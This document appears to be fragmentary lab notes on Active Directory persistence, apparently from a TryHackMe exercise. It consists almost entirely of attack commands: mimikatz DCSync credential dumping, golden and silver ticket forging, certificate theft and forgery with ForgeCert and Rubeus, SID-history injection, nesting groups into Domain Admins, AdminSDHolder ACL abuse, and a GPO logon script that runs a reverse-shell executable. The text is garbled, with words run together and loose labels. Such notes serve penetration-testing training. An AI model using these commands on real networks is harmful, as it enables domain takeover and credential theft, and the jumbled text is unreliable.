lsadump::dcsync /domain:<domain> /user:<username>
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
lsadump::dcsync /domain:<domain> /all
Golden Ticket crafted TGT,
Silver Ticket crafted TGS
Get-ADDomain
kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
crypto::certificates /systemstore:local_machine
privilege::debug
crypto::capi
crypto::cng
crypto::certificates /systemstore:local_machine /export
mimikatz
afterwardsForgeCert.exe --CaCertPath <domain>.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@<domain> --NewCertPath Administrator.pfx --NewCertPassword SecretPassword
* * Use Rubeus to request the TGT via
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain> /dc:<IP of domain controller>
privilege::debug
kerberos::ptt administrator.kirbi
dir \\<dc.example.com>\C$\
ntds.dit
stores all AD infoGet-ADUser <your ad username> -properties sidhistory,memberof
Get-ADGroup "Domain Admins"
ntds.dit
Stop-Service -Name ntds -force
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
Start-Service -Name ntds
Get-ADUser <username> -Properties sidhistory
dir \\<dc.example.com>\C$\
IT Support
Helpdesk
, Network Manager
is a nested group of IT Support
New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<username> Steam Network 1" -SamAccountName "<username>_steam_network1" -DisplayName "<username> Steam Network 1" -GroupScope Global -GroupCategory Security
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
Add-ADGroupMember -Identity "Domain Admins" -Members "<username>_2"
Add-ADGroupMember -Identity "<username>_steam_networks1" -Members "<low privileged username>"
dir \\<domain>\c$\
Get-ADGroupMember -Identity "Domain Admins"
AdminSDHolder
can be used to copy its ACL through the AD's protected groupsrunas /netonly /user:Administrator cmd.exe
and therein open mmc
Right click the group -> Properties -> Security -> Add user and Check Names -> OK -> Allow on Full Control -> Apply -> OK
Add the user to other groups with the new propagated permissions
copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe && timeout /t 20 && C:\windows\tmp\shell.exe
runas /netonly /user:Administrator cmd.exe
and therein open mmc
Catch the shell when an admin logs on
Once again open mmc
Click on every other group except Authenticated Users and remove them
Add -> Domain Computers
-> check names - OK
Social_engineering